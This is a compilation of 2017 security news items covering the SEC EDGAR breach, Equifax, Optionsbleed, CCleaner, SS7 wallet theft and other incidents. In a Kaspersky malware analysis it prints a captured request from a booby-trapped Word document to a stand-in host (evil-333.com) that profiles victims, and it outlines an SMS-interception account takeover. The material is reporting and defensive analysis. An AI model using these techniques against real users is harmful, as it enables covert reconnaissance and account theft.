“In August 2017, the Commission learned that an incident previously detected in 2016 may have provided the basis for illicit gain through trading. Specifically, a software vulnerability in the test filing component of our EDGAR system, which was patched promptly after discovery, was exploited and resulted in access to nonpublic information.” reads the statement on cybersecurity.

The SEC confirmed it is investigating the security breach but it did not share details about the attack, it only confirmed to have “promptly” fixed the flaw exploited by hackers.

Exactly as for the Equifax incident, this case is hilarious because the SEC agency is charged with protecting investors and markets.

The SEC believes the intrusion did not expose personally identifiable information.

“It is believed the intrusion did not result in unauthorized access to personally identifiable information, jeopardize the operations of the Commission, or result in systemic risk.” continues the statement.

“It’s hugely problematic and we’ve got to be serious about how we protect that information as a regulator,” said Bill Huizenga, chairman of the US House subcommittee that oversees the SEC.

Also in this case, experts pointed out the delay in the disclosure of the security breach.

“The agency detected the breach last year, but didn’t learn until last month that it could have been used for improper trading.” reported the Washington Post “The incident was briefly mentioned in an unusual eight-page statement on cybersecurity released by SEC Chairman Jay Clayton late Wednesday. The statement didn’t explain the delay in the announcement, the exact date the system was breached and whether information about any specific company was targeted.”

“Notwithstanding our efforts to protect our systems and manage cybersecurity risk, in certain cases cyber threat actors have managed to access or misuse our systems,” Clayton said in the statement.

In July, the congressional watchdog Government Accountability Office published a 27-page report that warned of security issues in SEC systems. Lack of encryption, poorly configured firewalls are just a few non-compliance reported by the watchdog.


Hack of U.S. Regulator a Blow to Confidence in Financial System
22.9.2017 securityweek Hacking
The hack disclosed at the U.S. Securities and Exchange Commission deals a fresh blow to confidence in the security of the financial system weeks after news of a potentially catastrophic breach at a major U.S. credit bureau.

The stock market regulator said late Wednesday a software vulnerability allowed hackers to gain "nonpublic" information that could have enabled them to make profits with inside information.

SEC chairman Jay Clayton said the leaked information from 2016 "may have provided the basis for illicit gain through trading," while noting that the vulnerability had been patched and that an investigation was underway.

The revelation comes two weeks after Equifax, one of three major credit bureaus which maintain financial and personal data on consumers, announced that attackers had hacked accounts of some 143 million Americans, in what could be the worst-ever breach because of the sensitivity of the information.

Johannes Ullrich, dean of research at the SANS Internet Storm Center, said that while the two events are likely quite different, both could undermine confidence in online financial systems.

"A lot of our financial systems particularly online systems are based on trust, and if that trust is violated people could opt out of these systems," Ullrich said.

But Ullrich noted that even if people stop using online networks, that may not protect them against hackers.

"Even if you don’t set up online banking the criminal may set it up for you," he said.

"If you don't want to use your credit card online and give your number over the phone, that person is entering the same information in the system."

Ullrich said the SEC breach underscores weak cybersecurity in government networks, after the federal Office of Personnel Management breach disclosed in 2015 affecting tens of millions of employees and contractors.

He said government networks "are really behind the curve in designing the right values and the right protection" of data.

Ironically, the SEC now must point a finger at itself for delaying the disclosure which it requires from publicly traded companies.

"The breach itself appears to be fairly minor, but it erodes trust in government organizations where companies are required by law to report confidential or insider information," said Tatu Ylonen, a computer researcher and founder of SSH Communications Security.

Ylonen said federal cybersecurity guidelines are "in pretty good shape" but that "a problem is that agencies are implementing these measures in different stages, and some agencies haven't made it a priority."

- Critical infrastructure at risk -

James Scott, a researcher at the Institute for Critical Infrastructure Technology, said the latest incident highlight the vulnerability of financial networks despite a threat-sharing system which aims to prevent attacks.

"All of our critical infrastructure systems are not doing a sufficient job of protecting their treasure troves of data," Scott said.

"We are lacking confidence in our election systems, we are lacking confidence in the health system in protecting patient records and now the financial sector."

Until recently, Scott said the health sector appeared the most vulnerable "but the financial sector is evolving in 2017 as a major problem."

Scott said the SEC hackers could be from any number of elements including "cyber mercenaries" or nation-states.

"Russia is notorious for gaining access to this type of information but they are not known for acting on it," he said.

A more likely source, according to Scott, would be an extremist group seeking to raise cash quickly or a state such as North Korea which is "pressed for cash."

The SEC attack is especially embarrassing because it comes following the July release of a congressional audit which said the agency had failed to implement security recommendations made two years earlier.

The SEC "had not fully implemented 11 recommendations" on protecting data and encrypting sensitive information, said the report by the Government Accountability Office.

Dan Guido, co-founder of the security firm Trail of Bits, said the SEC incident is not surprising given the current state of affairs in cybersecurity.

"It reflects the status quo of our digital security," Guido said. "It's not substantially different than the ones that came before it. We will continue to tolerate these repeated breaches until it's clear that people's lives are stake."


An (un)documented Word feature abused by attackers
21.9.2017 Kaspersky Hacking
A little while back we were investigating the malicious activities of the Freakyshelly targeted attack and came across spear phishing emails that had some interesting documents attached to them. They were in OLE2 format and contained no macros, exploits or any other active content. However, a close inspection revealed that they contained several links to PHP scripts located on third-party web resources. When we attempted to open these files in Microsoft Word, we found that the application addressed one of the links. As a result, the attackers received information about the software installed on the computer.

What did the bad guys want with that information? Well, to ensure a targeted attack is successful, intelligence first needs to be gathered, i.e. the bad guys need to find ways to reach prospective victims and collect information about them. In particular, they need to know the operating system version and the version of some applications on the victim computer, so they can send it the appropriate exploit.

In this specific case, the document looked like this:

There’s nothing suspicious about it at first glance – just a few tips about how to use Google search more effectively. The document contains no active content, no VBA macros, embedded Flash objects or PE files. However, when the user opens the document, Word sends the following GET request to one of the internal links. So we opened the original document used in the attack, replaced the suspicious links with http://evil-*, and obtained the following:

GET http://evil-333.com/cccccccccccc/ccccccccc/ccccccccc.php?cccccccccc HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; InfoPath.2; MSOffice 12)
Accept-Encoding: gzip, deflate
Host: evil-333.com
Proxy-Connection: Keep-Alive

This code effectively sent information about the software installed on the victim machine to the attackers, including info about which version of Microsoft Office was installed. We decided to examine why Office followed that link, and how these links can be identified in documents.

Inside a Word document
The first thing about the document that caught our eye was the INCLUDEPICTURE field containing one of the suspicious links. However, as can be seen, that is not the link that Word addresses.

As a matter of fact, the data chunk seen in the fragment above contains the first and only piece of text in this document. The text in Word documents resides in the WordDocument stream in a ‘raw state’, i.e. it contains no formatting except so-called fields. The fields tell Word that a certain segment of the text must be presented in a specific way; for example, it is thanks to these fields that we can see active links to other pages of the document, URL links, etc. The field INCLUDEPICTURE indicates that an image is attached to certain characters in the text. The 0x13 byte (marked in red) in front of this field indicates that the ‘raw’ text ends there and a field description begins. The description format is roughly as follows (according to [MS-DOC]: Word (.doc) Binary File Format):

Begin = 0x13
Sep = 0x14
End = 0x15
Field = <Begin> *<Field> [Sep] *<Field> <End>

The separator byte 0x14 is marked in yellow, and the field end byte 0x15 is shown inside the pink box.

The link to the image in the INCLUDEPICTURE field should be in ASCII format, but in this case it is in Unicode, so Word ignores the link. However, the separator byte 0x14 is followed by the byte 0x01 (shown in the green box) which indicates to the word processor that an image should be inserted at this point. The question is: how do we find this image?

The characters and groups of characters within the text also possess properties; just like fields, these properties are responsible for formatting (for example, they specify that a certain piece of text must be rendered in italics). The properties of characters are stored in a two-level table within document streams under the names ‘xTable’ and ‘Data’. We will not go into the complex details of how to analyze character properties, but as a result of this analysis we can find the character properties from the offset 0x929 to 0x92C in the WordDocument stream:

This is the byte sequence with the picture placeholder 0x14 0x01 0x15. In the actual document, these bytes are located at offsets 0xB29 – 0xB2C, but the WordDocument stream begins with offset 0x200, and the character offsets are specified relative to its beginning.

The properties of the group of characters CP[2] indicate that an image is attached to them that is located in the Data stream at offset 0:

1FEF: prop[0]: 6A03 CPicLocation
1FF1: value[0]: 00000000 ; character = 14

We arrive at this conclusion based on the fact that byte 0x01 is indicated in the INCLUDEPICTURE field’s value – this means the image should be located in the Data stream at the appropriate offset. If this value were different, then it would have been necessary to look for the image in a different place or ignore this property.

This is where we stumbled on an undocumented feature. Microsoft Office documentation provides basically no description of the INCLUDEPICTURE field. This is all there is:

0x43 INCLUDEPICTURE Specified in [ECMA-376] part 4, section 2.16.5.33.

Standard ECMA-376 describes only that part of INCLUDEPICTURE that precedes the separator byte. It has no description of what the data that follows it may mean, and how it should be interpreted. This was the main problem in understanding what was actually happening.

So, we go to offset 0 in the Data stream and see that the so-called SHAPEFILE form is located there:

Forms are described in a different Microsoft document: [MS-ODRAW]: Office Drawing Binary File Format. This form has a name and, in this case, it is another suspicious link:

However, this is just an object name, so this link is not used in any way. While investigating this form further, let’s look at the flags field (in the red box):

The value 0x0000000E resolves into a combination of three flags:

msoblipflagURL 0x00000002
msoblipflagDoNotSave 0x00000004
msoblipflagLinkToFile 0x00000008
This indicates that additional data should be attached to the form (it is highlighted in yellow in the screenshot), and that this data constitutes a URL that leads to the actual content of the form. Also, there is a ‘do not save’ flag, which prevents this content from being saved to the actual document when it is opened.

If we look at what this URL is, we see that it’s the actual link that Word follows when the document is opened:

We should note that besides Word for Windows, this ‘feature’ is also present in Microsoft Office for iOS and in Microsoft Office for Android; LibreOffice and OpenOffice do not have it. If this document is opened in LibreOffice or OpenOffice, the malicious link is not called.

This is a complex mechanism that the bad guys have created to carry out profiling of potential victims for targeted attacks. In other words, they perform serious in-depth investigations in order to stay undetected while they carry out targeted attacks.

Kaspersky Lab’s security products are able to detect when the technique described in this article is used in Microsoft Word documents, and to find links embedded in a document using the same technique.


Optionsbleed vulnerability can cause Apache servers to leak memory data
21.9.2017 securityaffairs  Hacking

The vulnerability Optionsbleed in Apache HTTP Server that can cause certain systems to leak potentially sensitive data in response to HTTP OPTIONS requests.
The freelance journalist and security researcher Hanno Böck discovered a vulnerability, dubbed ‘Optionsbleed’. in Apache HTTP Server (httpd) that can cause certain systems to leak potentially sensitive data in response to HTTP OPTIONS requests.

Böck was analyzing HTTP methods when he noticed that requests with the OPTIONS method, which is normally used by a client to ask a server which HTTP methods it supports, were returning apparently corrupted data via the “Allow” header instead of the list of supported HTTP methods (e.g. “Allow: GET, POST, OPTIONS, HEAD”). However, some of the responses to the researcher’s requests looked like this:

Below an example of the response obtained by Böck:

Allow: POST,OPTIONS,,HEAD,:09:44 GMT
Allow: GET,HEAD,OPTIONS,,HEAD,,HEAD,,HEAD,, HEAD,,HEAD,,HEAD,,HEAD,POST,,HEAD,, HEAD,!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"
Allow: GET,HEAD,OPTIONS,=write HTTP/1.0,HEAD,,HEAD,POST,,HEAD,TRACE
Apache leaked server memory due to a use-after-free bug tracked as CVE-2017-9798.

optionsbleed

Respect other flaws “bleeding” memory contents like Heartbleed, the Optionsbleed vulnerability is less severe because in order to be exploited the targeted system needs to be configured in a certain way, and anyway the response doesn’t always contain other data.

Security firm Sophos published a detailed analysis of the vulnerability.

The expert tested the Optionsbleed flaw in the Alexa Top 1 Million websites and received corrupted Allow headers from only 466 of them.

With the support of the Apache developer Jacob Champion, Böck verified that the Optionsbleed vulnerability only affects specific configurations. Böck has released a proof-of-concept (PoC) script for Optionsbleed.

“Apache supports a configuration directive Limit that allows restricting access to certain HTTP methods to a specific user. And if one sets the Limit directive in an .htaccess file for an HTTP method that’s not globally registered in the server then the corruption happens. After that I was able to reproduce it myself. Setting a Limit directive for any invalid HTTP method in an .htaccess file caused a use after free error in the construction of the Allow header which was also detectable with Address Sanitizer. (However ASAN doesn’t work reliably due to the memory allocation abstraction done by APR.)” explained the researcher.

The researcher highlighted potential risks for shared hosting environments.

“The corruption is not limited to a single virtual host. One customer of a shared hosting provider could deliberately create an .htaccess file causing this corruption hoping to be able to extract secret data from other hosts on the same system,” Böck added.

The problem is not new, it was analyzed in a paper titled “Support for Various HTTP Methods on the Web” published back in May 2014, just a few weeks after the disclosure of the Heartbleed vulnerability.

The bad news for the Apache users is that the maintainers of the project could not provide an estimated date for the fix, for this reason, he decided to share its findings.

Development teams behind Linux distributions have also started releasing fixes for the Optionsbleed flaw.


Infrared Cameras Allow Hackers to Jump Air Gaps
20.9.2017 securityweek Hacking
A team of researchers from Israel has developed a piece of malware that demonstrates how hackers can abuse security cameras with infrared (IR) capabilities to send and receive data to and from an air-gapped network.

The research was conducted by the Ben-Gurion University of Negev and the Shamoon College of Engineering in Israel. Its goal was to show that a piece of malware installed in an air-gapped network can not only exfiltrate sensitive data, such as passwords, PINs and encryption keys, but also receive commands from the outside world via infrared light, which is invisible to the human eye.

Security cameras are typically equipped with IR LEDs that provide night vision capabilities. If an attacker can plant a piece of malware on the network connected to these cameras, the malware can take control of the IR LEDs and use them to transmit bits of data.

The malware described by experts, dubbed “aIR-Jumper,” can encode the stolen data using various methods. For example, if on-off keying (OOK) encoding is used, the absence of an IR signal for a certain duration encodes a zero (“0”) bit, while the presence of a signal for the same duration encodes a one (“1”) bit.

Encoding one character of a password, PIN or encryption key requires 8 bits (1 byte). However, for data transmission purposes, the researchers suggested also adding preamble bits for calibrating certain parameters (e.g. LED location and IR levels) and synchronization with the beginning of the transmission, and some bits for error detection.

Another encoding method suggested by the researchers involves frequency changes. For example, a “1” is encoded if the LED is on for a certain duration at a certain frequency, and a zero is encoded if it’s on at a different frequency. Similarly, intensity level changes, or amplitude shift keying (ASK), can be used.

Data transmission rates depend on the security camera and the camera used to capture the data (e.g. GoPro, smartphone camera). Experiments conducted by the researchers showed that data can be exfiltrated at a rate of 20 bits/sec over a distance of tens of meters, and it can be infiltrated over a distance of hundreds of meters and even kilometers at a rate of 100 bits/sec.

Data transmission rates can be increased significantly if more than one security camera is used by the attacker. Videos have been published to show how the infiltration and exfiltration attacks work.


'Optionsbleed' Flaw Causes Apache to Leak Data
20.9.2017 securityweek Hacking
A vulnerability found in Apache HTTP Server (httpd) can cause certain systems to leak potentially sensitive data in response to HTTP OPTIONS requests, a researcher warned.

The flaw was discovered by freelance journalist and security researcher Hanno Böck, who has dubbed it “Optionsbleed.” Despite having a fancy name that is similar to the critical OpenSSL vulnerability known as Heartbleed due to them both “bleeding” memory contents, Optionsbleed is not as severe or as widespread.

Böck was analyzing HTTP methods in an effort to determine if they have any vulnerabilities when he noticed that requests with the OPTIONS method, which allows a client to ask a server which HTTP methods it supports, were returning what appeared to be corrupted data via the “Allow” header.

Typically, responses to OPTIONS requests should contain a list of supported HTTP methods in the Allow header (e.g. “Allow: GET, POST, OPTIONS, HEAD”). However, some of the responses to the researcher’s requests looked like this:

Allow: POST,OPTIONS,,HEAD,:09:44 GMT

Allow: GET,HEAD,OPTIONS,,HEAD,,HEAD,,HEAD,, HEAD,,HEAD,,HEAD,,HEAD,POST,,HEAD,, HEAD,!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"

Allow: GET,HEAD,OPTIONS,=write HTTP/1.0,HEAD,,HEAD,POST,,HEAD,TRACE

Further analysis revealed that Apache leaked server memory due to a use-after-free bug. The flaw, which could result in the exposure of sensitive data, has been assigned the CVE identifier CVE-2017-9798.

What makes the Optionsbleed flaw less severe is the fact that the targeted system needs to be configured in a certain way for an attack to work, and the response doesn’t always contain other data. Requests sent by the expert to the Alexa Top 1 Million websites resulted in corrupted Allow headers from only 466 of them.

Apache is one of the most widely used web servers. Data from Netcraft shows that Apache was used by roughly 40 percent of the top million most visited websites in August.

With help from Apache developer Jacob Champion, Böck determined that the flaw only affects specific configurations.

“Apache supports a configuration directive Limit that allows restricting access to certain HTTP methods to a specific user. And if one sets the Limit directive in an .htaccess file for an HTTP method that's not globally registered in the server then the corruption happens,” the researcher explained. “Setting a Limit directive for any invalid HTTP method in an .htaccess file caused a use after free error in the construction of the Allow header which was also detectable with Address Sanitizer.”

While the security bug does not pose a risk for a majority of websites using Apache, it could represent a serious problem in shared hosting environments.

“The corruption is not limited to a single virtual host. One customer of a shared hosting provider could deliberately create an .htaccess file causing this corruption hoping to be able to extract secret data from other hosts on the same system,” Böck warned.

The expert pointed out that the leaks were evident in a paper on support for HTTP methods that was published in May 2014, roughly one month after Heartbleed came to light, but no one noticed the problem at the time.

Böck said the Apache security team could not provide an estimated date for when a patch would become available, so he decided to make his findings public before a fix was included in a new Apache httpd release. Optionsbleed can still be patched by making source code changes. Several Linux distributions have also started releasing fixes.

Böck has released a proof-of-concept (PoC) script for Optionsbleed and Sophos has published a blog post with a detailed technical description of the flaw.


Here’s How Hackers Can Hijack Your Online Bitcoin Wallets
19.9.2017 thehackernews Hacking
Researchers have been warning for years about critical issues with the Signaling System 7 (SS7) that could allow hackers to listen in private phone calls and read text messages on a potentially vast scale, despite the most advanced encryption used by cellular networks.
Despite fixes being available for years, the global cellular networks have consistently been ignoring this serious issue, saying that the exploitation of the SS7 weaknesses requires significant technical and financial investment, so is a very low risk for people.
However, earlier this year we saw a real-world attacks, hackers utilised this designing flaw in SS7 to drain victims' bank accounts by intercepting two-factor authentication code (one-time passcode, or OTP) sent by banks to their customers and redirecting it to themselves.
If that incident wasn't enough for the global telecoms networks to consider fixing the flaws, white hat hackers from Positive Technologies now demonstrated how cybercriminals could exploit the SS7 flaw to take control of the online bitcoin wallets to steal all your funds.
Created in the 1980s, SS7 is a telephony signalling protocol that powers over 800 telecom operators across the world, including AT&T and Verizon, to interconnect and exchange data, like routing calls and texts with one another, enabling roaming and other services.
Here's How Hackers Hacked into Bitcoin Wallet and Stole Fund

While demonstrating the attack, the Positive researchers first obtained Gmail address and phone number of the target, and then initiated a password reset request for the account, which involved sending a one-time authorization token to be sent to the target's phone number.
Just like in previous SS7 hacks, the Positive researchers were able to intercept the SMS messages containing the 2FA code by exploiting known designing flaws in SS7 and gain access to the Gmail inbox.
From there, the researchers went straight to the Coinbase account that was registered with the compromised Gmail account and initiated another password reset, this time, for the victim's Coinbase wallet. They then logged into the wallet and emptied it of crypto-cash.
Fortunately, this attack was carried out by security researchers rather than cybercriminals, so there wasn't any actual fraud of bitcoin cryptocurrencies.
This issue looks like a vulnerability in Coinbase, but it's not. The real weakness resides in the cellular system itself.
Positive Technologies has also posted a proof-of-concept video, demonstrating how easy it is to hack into a bitcoin wallet just by intercepting text messages in transit.
Different SS7 Attack Scenarios
This attack is not limited to only cryptocurrency wallets. Any service, be it Facebook or Gmail, that relies on two-step verification are vulnerable to the attacks.
The designing flaws in SS7 have been in circulation since 2014 when a team of researchers at German Security Research Labs alerted the world to it.
The flaws could allow hackers to listen to phone calls and intercept text messages on a potentially massive scale, despite the most advanced encryption used by cellular network operators.
Last year, the researchers from Positive Technologies also gave demonstrations on the WhatsApp, Telegram, and Facebook hacks using the same designing flaws in SS7 to bypass two-factor authentication used by those services.
At TV program 60 Minutes, Karsten Nohl of German Security Research Labs last year demonstrated the SS7 attack on US Congressman Ted Lieu's phone number (with his permission) and successfully intercepted his iPhone, recorded call, and tracked his precise location in real-time just by using his cell phone number and access to an SS7 network.
Although the network operators are unable to patch the issues anytime soon, there's little a smartphone user can do.
Avoid using two-factor authentication via SMS texts for receiving OTP codes. Instead, rely on cryptographically-based security keys as a second authentication factor.


Ex-porn Actor German Spy Guilty of Trying to Share State Secrets
19.9.2017 securityweek Hacking
A former German intelligence agent who was also an ex-gay porn actor was Tuesday given a one-year suspended sentence for attempting to share state secrets while pretending to be a jihadist online.

The 52-year-old named as Roque M., made headlines when he was arrested last November in what initially appeared to be a case of an Islamist mole at work in Germany's domestic spy agency.

But he was freed in July after prosecutors dropped most of the charges, finding no evidence of an attack plot or ties to Islamist groups.

He told the court that he pretended to be a jihadist planning an attack in online chatrooms because he was bored.

"I never met with any Islamists. I would never do that. The whole thing was like a game," the suspect said at the start of his trial in the western city of Duesseldorf.

A former banker and a father-of-four, Roque M. told the court that he monitored the Islamist scene as part of his job for the Office for the Protection of the Constitution (BfV), a role he described as "a lot of fun".

But he said he grew bored on weekends when he was at home watching his disabled son, and immersed himself in the online world of Islamists, feigning to be one himself.

It was "an escape from reality," he said in court.

He even went so far as to arrange a meeting with a suspected Islamist at a gym, although Roque M. insisted he never had any intention of going.

He was caught after he offered to share classified information about BfV operations with someone who turned out to be a colleague working undercover.

The case initially sparked outrage, with Germany's domestic spy agency fending off calls for a complete security overhaul for allowing an "Islamist" to infiltrate its team who had passed multiple screenings.

The intelligence agent's colourful past as a gay porn actor also enthralled the public.

But as no evidence emerged of an actual Islamist plot, prosecutors left Roque M. facing the sole charge of attempting to share state secrets.


DigitalOcean Warns of Vulnerability Affecting Cloud Users
19.9.2017 securityweek Hacking
DigitalOcean is warning customers that some 1-Click applications running MySQL have an account with the same default password across all instances, and the company says the issue affects other cloud providers as well.

DigitalOcean customers reported on social media that they received an email recommending that they run a script to determine if their Droplets – the name used by the company for its cloud servers – are affected by the vulnerability.

The company allows its users to deploy pre-built and pre-configured applications with only one click. The list of 1-Click (One-Click) applications includes Node.js, Rails, Redis, MongoDB, Docker, GitLab, Magento and many others.

DigitalOcean discovered that 1-Click applications running MySQL on Debian and Ubuntu create a MySQL user named “debian-sys-maint” that has the same password on all Droplets created from a 1-Click image.

The “debian-sys-maint” user is designed for local administration purposes and it should have a random password. However, due to a bug, all instances of an application created from the same 1-Click image have the same password.

DigitalOcean said the vulnerability, which is “potentially remotely exploitable,” affects MySQL and several other applications that use MySQL, including PHPMyAdmin, LAMP, LEMP, WordPress and OwnCloud.

“We will be issuing a public notice regarding this issue, but first wanted to ensure our impacted users had time to take action,” the company said in its email to customers. “As part of our verification process, we have discovered that images on other cloud providers also have this mis-configuration.”

DigitalOcean has provided a script that allows users to determine if their Droplets are affected and updates their password if needed. The script works on Ubuntu 14, 16 and 17, and Debian 7 and 8; Debian 9 is not impacted.

Customers who have changed the password for the “debian-sys-maint” user after installation of a 1-Click app are not affected by the flaw and they don’t need to take any action.

“We have changed our 1-Clicks to ensure that all future Droplets will have unique, auto-generated passwords for this user,” DigitalOcean said.


CCleaner Server Was Compromised in Early July
19.9.2017 securityweek Hacking
A server distributing a version of PC utility CCleaner infected with malware might have been compromised in early July, Avast revealed.

Two versions of the highly popular Windows maintenance tool (32-bit CCleaner v5.33.6162 and CCleaner Cloud v1.07.3191) were modified to distribute information stealing malware, and over 2 million users have been impacted by the incident. The infected binary was released on August 15 and remained undetected for four weeks.

CCleaner was developed by Piriform, which was acquired by anti-virus company Avast in July, 2017. After news of the infected installer broke on Monday, the security firm decided to step forward and clarify that the compromise likely happened before the July acquisition.

“Before we completed the acquisition, the bad actors were likely already in the process of hacking into the Piriform systems. The compromise may have started on July 3rd. The server was provisioned earlier in 2017 and the SSL certificate for the respective https communication had a timestamp of July 3, 2017,” an Avast blog post signed by Vince Steckler, CEO, and Ondrej Vlcek, CTO and EVP Consumer Business, reads.

The company also disclosed that they were warned of the infection by security company Morphisec, which says that it first encountered the malicious CCleaner installations on Aug. 20. However, it was only on Sept. 11 that Morphisec received logs from some of its customers and could start an investigation.

On Sept. 12, Morphisec warned Avast of the infection, and the latter was able to resolve the issue within 72 hours. By Sept. 15, the command and control server that the malware was contacting had been taken down and Piriform had already released a clean version of CCleaner.

Avast also claims that no actual harm was done to the impacted computers, despite the fact that 2.27 million users downloaded the infected application release, as the final payload in this attack never activated.

“About 30% of CCleaner users also run Avast security software, which enables us to analyze behavioral, traffic and file/registry data from those machines. Based on the analysis of this data, we believe that the second stage payload never activated, i.e. the only malicious code present on customer machines was the one embedded in the ccleaner.exe binary,” the company says.

CCleaner v5.34 and CCleaner Cloud v1.07.3214 have been released without the malicious code inside, and Avast says that only around 730,000 users are still running the affected version 5.33.6162 on their systems. The free CCleaner variant doesn’t include automatic updates, meaning that users need to manually download and install the clean version.

“We deeply understand the seriousness of the situation, as we do with all security threats. We regret the inconvenience experienced by Piriform’s customers. We plan to be issuing more updates on this as we go. We have made it our highest priority to properly investigate this unfortunate incident and to take all possible measures to ensure that it never happens again,” Avast also says.

Affected users are advised to update to the latest versions of CCleaner as soon as possible, to remove any malicious code from their computers.


The hacker Kuroi’SH defaced the official Google Brazil domain
18.9.2017 securityaffairs Hacking

A hacker using the online moniker of ‘Kuroi’SH’ defaced the Google Brazil domain on Tuesday afternoon, this isn’t the first high-profile target he breached.
A hacker using the online moniker of ‘Kuroi’SH’ defaced the official Google Brazil domain on Tuesday afternoon. The defaced page displayed a message greeting his friends for the successful attack on such a high-profile target.

“It is a great moment to die. Hacked by Kuroi’SH! Two Google at once, I don’t even care; f**k the jealous hates such as Nofawkx. Two Google at once world record idgaf :D. Greets to my friends Prosox & Shinobi h4xor.”

Below the deface page uploaded by the hacker and a video PoC of the hack:

Google Brazil defaced


Kuroi’SH successfully uploaded a deface page that remained on the domain for more than 30 minutes.

Kuroi’SH, who proclaims itself as “a half gray hat and white hat” explained that he was also able to control Google Paraguay but he didn’t have time to do it.

I reached Kuroi’SH to ask why he defaced the Google Brazil domain, he told me that it is a demonstrative hack to demonstrate that everything can be hacked.

He highlighted the importance of cyber security and the risks every company online face if underestimate cyber threats.

Google Brazil has also acknowledged the defacement, the company clarified that its systems were not hacker anyway.

“Google has not been hacked. DNS servers may have suffered an attack, redirecting to other sites.” states Google Brazil.

Follow
Google Brasil ✔@googlebrasil
O Google não foi hackeado. Servidores de DNS podem ter sofrido um ataque, redirecionando a outros sites. Sugestão: https://goo.gl/6icAam

9:06 PM - Jan 3, 2017
32 32 Replies 189 189 Retweets 223 223 likes
Twitter Ads info and privacy
Shortly after the attack, some Brazilian media outlets reported that hacker also defaced Google Maps and Google Translate domains, but Kuroi’SH has denied the involvement in other attacks.

My readers know very well Kuroi’SH, in 2015, he defaced NASA subdomains and published a pro-Palestinian message.

Such kind of attacks could be very dangerous because hackers targeting the DNS can redirect visitors to websites set up to deliver malware or to phishing websites … do not underestimate them!


Industry Reactions to Equifax Hack: Feedback Friday

9.9.2017 securityweek Hacking
News broke on Thursday that U.S. credit reporting agency Equifax suffered a massive data breach that could impact as many as 143 million customers, including people in the U.K. and Canada.

Hackers exploited a vulnerability in an unnamed website application to gain access to Equifax’s systems and data such as names, social security numbers, dates of birth, addresses, and driver's license numbers. More than 200,000 consumers in the U.S. also had their payment card numbers compromised.

Industry reactions to Equifax breach

Equifax learned of the breach on July 29 and immediately started taking steps to contain the incident and assess its impact. However, many are displeased that it took the company two months to inform customers that their information was compromised.

SEC filings showed that three of the company's executives had sold shares worth nearly $1.8 million shortly after the breach was discovered, but Equifax denied that they had knowledge of the incident when they made the decision.

Industry professionals have shared thoughts on various details of the breach, including how the company handled the incident, GDPR and other compliance aspects, and long-term implications.

And the feedback begins…

Marten Mickos, CEO, HackerOne:

“Equifax is the latest example of a company who is human. No one is perfect, and everyone is being hacked in some way or another. Financial services have always been attractive targets for criminals and this trend continues as everything goes online. It’s also not news that the cybersecurity industry is facing a severe skills shortage. Teams are typically short staffed, under funded and doing the best they can. That’s why it’s so important to open up a channel of communication with the ethical hacker community to help surface critical bugs before they are exploited.

We looked at Equifax’s website and found no easy way for hackers to disclose anything. A couple bugs have been disclosed via Open Bug Bounty, a non-profit project designed to connect hackers with website owners to resolve bugs in a transparent and open manner. One of which was disclosed for their UK website that took nearly five months to resolve, and the second for the U.S. website, which has yet to be resolved.

Equifax isn’t alone. It’s one of the 94 percent of the Forbes Global 2000 that don’t have a way for ethical hackers to disclose any bugs they find -- a stark difference to the 39 percent of tech unicorns in the same position.”
Richard Henderson, global security strategist, Absolute:

“We have to expect that the fallout from this will likely be unprecedented. Many people are going to lose their jobs, including Equifax executives, people will be brought before Congress to explain what happened, and consumer trust in *all* of the credit reporting agencies will be eroded.

It may be time for us to reconsider exactly how we allow companies to store all of this data. It’s clear that these mega-databases are prime targets for attack, and we may need to take a hard look at legislative changes that will force databrokers and collectors to take security up a few levels.”
Etienne Greeff, CTO and Co-Founder, SecureData:

“In response to the breach, Equifax created a website – Equifaxsecurity2017.com – that offers free identity theft protection and credit file monitoring to all US customers. However, customers are asked to input additional information into the website that doesn’t even have a valid security certificate. It’s akin to offering contents insurance to a person whose house has already been robbed – and potentially putting them at risk even further. What’s more, Equifax has been relatively tight lipped about the type of information that has been compromised, meaning if customers want to take advantage of the company’s Credit Freeze feature to prevent further credit theft, they have to use a PIN number that may or may not have been stolen by cybercriminals.

In short, Equifax’s knee-jerk and ill-considered response to the breach is shambolic. It appears the company is more concerned about its own image than supporting customers and providing transparency on what exactly has happened. With the GDPR legislation due to come down heavily on companies that neglect to better protect customer data, this should serve as a lesson to other businesses about how to be more prompt and forthcoming with action against cybercrime.”
Nathan Wenzler, chief security strategist, AsTech:

“It should be noted, also, that this breach did not happen by the more popular social engineering style attacks such as a phishing email compromising an employee's system or a malicious insider leaking the data, but rather, this was due to an application vulnerability in one of their websites. This is something we in the security community continue to see rising, as organizations are getting better and better at defending servers, workstations and laptops, the cyber criminals simply move on to the next easiest target, which is most commonly the organization's web applications.

No matter what industry your company is in, it's simply not good enough to defend internal systems alone. More and more, a comprehensive security strategy is absolutely necessary that covers education, technical security controls for servers and other assets, network security and stronger software development practices that create secure applications during development and not tacked on after the fact. Hackers will find the easiest path to steal data, and organizations must be more diligent about making security part of every aspect of their technology infrastructure and development efforts.”
Chris Pierson, CSO, Viewpost:

“Today, Equifax publicly announced that it learned of unauthorized access to its systems between mid-May and July 2017, but that intruders did not have access to its core credit reporting databases. It was noteworthy that the CEO appeared in a taped video statement to announce the breach and this is important from a governance and accountability perspective. It was less heartening that the credit monitoring sign-up process appears to be convoluted. You can check to see if you are affected, but the system does not give you a reply other than to check back in 4 days. This is a miss from an operational and reputational perspective where consumers should be able to access the free credit monitoring being offered at the point in time the notice is provided.”
Eduard Goodman, global privacy officer, CyberScout:

“This incident underlies one of the key issues with the U.S. consumer credit system and centralization of credit data on Americans: We have become overly reliant on the three credit bureaus who act as the sole data ‘brokers’ and repositories of data for creditworthiness, making an exposure like this a very dangerous event.

With loss of not just SSNs but other secondary pieces of data like previous addresses, mother’s maiden name or the banking institutions with which consumers hold loans, to some degree we have exposed an entire consumer facing security ecosystem to failure since everyone from credit loan verification to online account sign ups depend on this information to help verify us all. The impact of this breach, depending upon who actually has obtained the information and how it is misused could last for a decade.”
David Emm, principal security researcher, Kaspersky Lab:

